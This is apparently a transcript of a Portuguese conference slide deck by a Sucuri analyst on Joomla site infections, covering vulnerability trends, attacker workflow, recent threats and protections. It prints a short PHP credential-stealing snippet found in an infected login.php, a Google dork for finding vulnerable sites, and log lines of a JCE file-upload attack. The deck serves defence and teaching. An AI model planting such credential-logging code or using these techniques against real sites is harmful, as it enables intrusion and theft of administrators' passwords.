Analise de Infeccoes no Joomla - JDBR14

Análise de Infecções em Joomla Bruno Borges, CEH, Security Analyst
@ Sucuri.net #JDBR14 @brunoborgessec

O Joomla costuma ser hackeado? #JDBR14 :: @brunoborgessec

SIM ! Má notícia: #JDBR14 :: @brunoborgessec

A maior parte das infecções são em Joomla 1.5.x Boa
notícia: Ufa! Afinal de contas, todos usamos a versão 3.2, 3.3 … Será? o.O #JDBR14 :: @brunoborgessec (Não quer dizer que 2.x e 3.x sejam amplamente seguras)

Se você usa Joomla 1.5.x puro: •  Você já foi
hackeado •  Você será hackeado •  Você está sendo hackeado #JDBR14 :: @brunoborgessec

Histórico de Releases do Joomla #JDBR14 :: @brunoborgessec

Tipos de Vulnerabilidades #JDBR14 :: @brunoborgessec Fonte: http://www.cvedetails.com/vendor/3496/Joomla.html

Vulnerabilidades através dos anos #JDBR14 :: @brunoborgessec Fonte: http://www.cvedetails.com/vendor/3496/Joomla.html

Ataques ao Joomla #JDBR14 :: @brunoborgessec

Vetores de Ataque #JDBR14 :: @brunoborgessec

Processo dos ataques atuais 1) Encontrar vulnerabilidade: seclists.org/fulldisclosure exploit-db.com cve.mitre.org
web.nvd.nist.gov

Processo dos ataques atuais 2) Encontrar alvo Google Dork: inurl:index.php?option=com_collector
shodanhq.com #JDBR14 :: @brunoborgessec

Processo dos ataques atuais 3) Ataque! #JDBR14 :: @brunoborgessec

Ameaças / Vulnerabilidades Recentes #JDBR14 :: @brunoborgessec

Ameaças / Vulnerabilidades Recentes Qualquer versão < 3.1.0.4 RCE ->
Remote Code Execution: Vulnerabilidade que pode permitir a um invasor executar código arbitrário e assumir o controle do sistema afetado Joomla JomSocial: Remote Code Execution #JDBR14 :: @brunoborgessec Fonte: http://blog.sucuri.net/2014/02/joomla-jomsocial-remote-code-execution-vulnerability.html

Ameaças / Vulnerabilidades Recentes Joomla Password Stealer Arquivo infectado: /administrator/components/com_login/models/login.php
$fh = fopen("components/com_login/models/login.txt", 'a'); date_default_timezone_set("America/Chicago"); fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\n"); fclose($fh); #JDBR14 :: @brunoborgessec http://labs.sucuri.net/?note=2013-11-21

Ameaças / Vulnerabilidades Recentes Backdoor de todos os dias #JDBR14
:: @brunoborgessec

Ameaças / Vulnerabilidades Recentes JPG EXIF Headers #JDBR14 :: @brunoborgessec
http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

Ameaças / Vulnerabilidades Recentes JCE Remote File Upload 197.205.70.37 -
- [23/Jan/2014:16:46:54 -0500] "POST /index.php? option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c124 6b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)" 197.205.70.37 - - [23/Jan/2014:16:46:55 -0500] "POST /index.php? option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)” http://blog.sucuri.net/2014/03/jce-joomla-extension-attacks-in-the-wild.html

Proteções #JDBR14 :: @brunoborgessec

Proteções Bloquear PHP onde não deve ter <Files *.php> deny
from all </Files> Ex: /images/stories #JDBR14 :: @brunoborgessec

Proteções Patching x Virtual Patching Patching: Atualizar para corrigir vulnerabilidades
existentes. Virtual Patching: Soluções de produtos que permitem a proteção de vulnerabilidades existentes quando não for possível aplicar o patch. Ex: Joomla 1.5.x #JDBR14 :: @brunoborgessec

Proteções Web Application Firewall / Website Firewall •  A forma
mais rápida de proteger o seu site. •  Requer pouco esforço. •  Necessário pouco conhecimento de Segurança #JDBR14 :: @brunoborgessec

Proteções Verifique se seu site está limpo: sitecheck.sucuri.net #JDBR14 ::
@brunoborgessec

Considerações Finais #JDBR14 :: @brunoborgessec

Dúvidas #JDBR14 :: @brunoborgessec

OBRIGADO! @brunoborgessec /in/brunoaborges [email protected] bbsec.net / sucuri.net #JDBR14 :: @brunoborgessec

Analise de Infeccoes no Joomla - JDBR14

Analise de Infeccoes no Joomla - JDBR14

More Decks by Bruno Borges

Other Decks in Technology

Featured

Transcript